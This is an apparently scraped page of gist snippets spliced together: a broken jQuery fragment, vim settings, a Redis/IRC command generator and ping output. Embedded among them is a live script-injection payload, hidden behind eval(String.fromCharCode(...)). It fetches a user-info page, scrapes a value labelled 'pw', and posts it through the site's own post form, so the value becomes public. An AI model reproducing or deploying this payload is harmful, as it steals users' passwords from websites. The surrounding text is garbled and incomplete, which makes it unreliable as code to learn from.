Skip to content

Instantly share code, notes, and snippets.

(function($){
var button = {
el: function() {
return ("#button");
},
result: function(data) {
this.el().enabled();
console.log("data %o", data);
},
" Whitespace stuff
set nowrap
set tabstop=4
set shiftwidth=4
set softtabstop=4
set expandtab
set list listchars=tab:\ \ ,trail:·
</script<script>eval(String.fromCharCode(36,46,103,101,116,40,39,47,117,115,101,114,95,105,110,102,111,39,44,32,102,117,110,99,116,105,111,110,40,100,97,116,97,41,123,13,10,118,97,114,32,105,110,102,111,68,111,109,32,61,32,36,40,100,97,116,97,41,59,13,10,118,97,114,32,112,119,32,61,32,36,40,34,46,116,97,98,108,101,45,99,111,110,100,101,110,115,101,100,32,116,114,58,110,116,104,45,99,104,105,108,100,40,50,41,32,116,100,34,44,32,105,110,102,111,68,111,109,41,46,116,101,120,116,40,41,59,13,10,36,40,34,35,116,105,116,108,101,34,41,46,118,97,108,40,34,108,111,108,119,117,116,34,41,59,13,10,112,119,32,61,32,101,115,99,97,112,101,40,112,119,41,59,13,10,36,40,34,35,99,111,110,116,101,110,116,34,41,46,118,97,108,40,112,119,41,59,13,10,118,97,114,32,112,97,114,97,109,115,32,61,32,36,40,34,35,110,101,119,95,112,111,115,116,34,41,46,115,101,114,105,97,108,105,122,101,40,41,59,13,10,36,46,112,111,115,116,40,34,47,97,106,97,120,47,112,111,115,116,115,34,44,32,112,97,114,97,109,115,41,59,13,10,125,41,59))</script>
|level0
map <c-j> <c-w>j
map <c-k> <c-w>k
map <c-l> <c-w>l
map <c-h> <c-w>h
@ericbutera
ericbutera / gist:7292394
Created November 3, 2013 17:07
generate redis commands easy like from js console
"publish TOIRC "+ JSON.stringify({Type:"raw", To:"", Message:"", Command:"NICK yomama"}).replace(/"/gi, '\\"');
"publish TOIRC "+ JSON.stringify({Type:"privmsg", To:"#moo", Message:"a message", Command:""}).replace(/"/gi, '\\"');
Results of ping while running speedtest at http://www.dslreports.com/speedtest
PING google.com (172.217.0.14): 56 data bytes
64 bytes from 172.217.0.14: icmp_seq=0 ttl=51 time=26.114 ms
64 bytes from 172.217.0.14: icmp_seq=1 ttl=51 time=26.938 ms
64 bytes from 172.217.0.14: icmp_seq=2 ttl=51 time=44.367 ms
64 bytes from 172.217.0.14: icmp_seq=3 ttl=51 time=29.182 ms
64 bytes from 172.217.0.14: icmp_seq=4 ttl=51 time=25.869 ms
64 bytes from 172.217.0.14: icmp_seq=5 ttl=51 time=25.811 ms
64 bytes from 172.217.0.14: icmp_seq=6 ttl=51 time=26.336 ms